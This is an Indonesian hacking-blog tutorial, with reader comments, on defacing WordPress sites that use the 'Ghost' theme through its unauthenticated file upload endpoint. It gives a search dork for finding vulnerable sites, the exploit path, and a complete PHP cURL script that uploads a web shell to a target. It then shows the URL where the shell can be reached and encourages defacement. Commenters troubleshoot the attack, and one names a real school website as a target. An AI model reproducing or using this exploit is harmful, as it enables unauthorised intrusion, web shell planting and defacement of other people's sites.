Friday 4 March 2016

Tutorial Deface dengan Teknik WordPress Ghost Theme File Upload

Hallo fans .-. Nuenomaru disini.
diPostingan sebelumnya Nue share Deface Website Phising dengan Hidden Uploader.
Sekarang Nue akan Share Tutorial Deface dengan Exploit WordPress Ghost Theme File Upload *ini exploit lama sih wkwkw
exploit ini salah satu bug/celah yang ada pada theme di CMS WordPress.
iseng2 aja share, Kali aja masih crotz wkwkw *yg master minggir dlu ;*

bahan bahan:
- PC yang tersambung dengan Internet
- Xampp
- Shell & Script Deface
- Kopi , sabun , Lilin (hukumnya sunah wkwkw :v ) 


Lanjotz
Edited By: OepilCore

pertama buka xamppnya dlu, pastikan tanda ; pada curl di php.ini sudah di hapus.
Jika Sudah terinstall kamu buka PHP.ini , cek di System C > xammp > php > php.ini

Lalu tekan CTRL+F lalu ketikkan curl lalu hapus tanda titik dua koma ( ; )


Dork: inurl:wp-content/themes/Ghost/
(kembangin lg, gunakan imajinasi bokever agan, biar dpt yg vuln and verawan)

1. Dorking di search Engine

2. pilih salah satu web target yg pengen ente tusb0l pak wkwk, lalu masukan exploitnya.

exploit: /wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php

3. Vulnerability ~ {"status":"NOK", "ERR":"This file is incorect"}

Vuln boss

4. Buat File Baru Berekstensi .php Contoh ghost.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit dan taruh juga shell sobat di directory yang sama dgn ghost.php tadi

<?php

$uploadfile="namashell.php";

$ch = curl_init("target.co.li/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php");

curl_setopt($ch, CURLOPT_POST, true);  

curl_setopt($ch, CURLOPT_POSTFIELDS,

        array('Filedata'=>"@$uploadfile"));

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$postResult = curl_exec($ch);

curl_close($ch);

print "$postResult";


?>

5. Buka Xampp kalian yang sudah terinstall, nyalakan apace sama mysql nya
6. Buka CMD dan ketikan perintah
cd C:/xampp/php
php namaexploitlo.php



7. jika sukses , akan muncul nama shell sobat di CMD,dan akan keluar lengkap link akses shell ente



8. Shell Akses: 

www.target.co.li/wp-content/uploads/settingsimages/namashell.php

Done~ ..

Nah kalo dah masuk ke shell, seterah dah sobat mo apain, bedah isi ampe usus2nya kek.
kalo mau deface saya sarankan nitip file aja yak, kalo mau nebas index (JANGAN LUPA DI BACK UP DUANCOK :) ))


cuma nitip file Umz :'(

Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kamiTKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy WordPress Hacked !!
Sekian dan semoga bermanfaat .. terimakasih



source and thanks to: 0day












foto hanya pemanis di thread :'v















Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

21 comments

di tunggu tutorial selanjut nya mastah _/|\_

haha terimakasih telah membaca artikel diblog kami. masalah mastah :o , kamu lbh mastah dari pada kami bang :D
ouh iya baca juga artikel trbaru diblog ini, yg dipost oleh uyulcrack: http://tkjcyberart.blogspot.co.id/2016/06/warehouse-responsive-prestashop-16.html

terus stay dimarii yoo.. makasihh bang.
#Nuenomaru

that upload script is crap. Can't upload shit with it, don't know why. I was finalyyyyyyy able to get it uploaded using a different upload script. Fun stuff

bisa kok bang, abang bikin script uploadifynya aja yg HTML atau buat auto exploitnya sisipin ke site yg abang pernah dipes :D

#Nuenomaru

Gan Pas Visit url shell koq error 500 internal server

hehehe utk exploit ini ane bloman tau cara nanggulangi 500 internal server :D , jdi cari target laen saja ya mz

#Nuenomaru

gan pas visit url shell koq error 500 internal server sih ?

xixixhi,, ganti target ajah dlu gan :v
#Nuenomaru

This comment has been removed by the author.

Bang kalo website kayak gini bisa gak?
http://www.smpn3tasikmalaya.sch.id
Itu sebenernya wordpres saya coba dari conto orang lain gak bisa gagal mulu

walaupun CMS Nya sama2 wordpress, belum tentu Bug nya sama om :D
silahkan explore lbh daalam

#Nuenomaru

Bang di cmd'nya kok tetulis {"status":"NOK", "ERR":"This file is incorrect"} .. itu maksudnya apa ya ?

silahkan cari target laen om
#Nuenomaru

misi bang, tanda ; curl di php.ini kan ada 3,itu yg mana? di hapus semua atau cuma di bagian curl.cainfo= ?

akwkakawk,, >..<"
coba baca google yaw, baca pelan2
#Nuenomaru

hehe maklum bang ane kgk bisa maen ginian,kalo waktu akses shell nya blank gimana bang ?

coba bypass ekstensinye dl deh
#Nuenomaru

Jd intinya itu tebak2an password yg kita bikin sendiri ya?

Gan Cara Hapus ; INI gimana ya Ane Masih bingung ??? Fast Respone


EmoticonEmoticon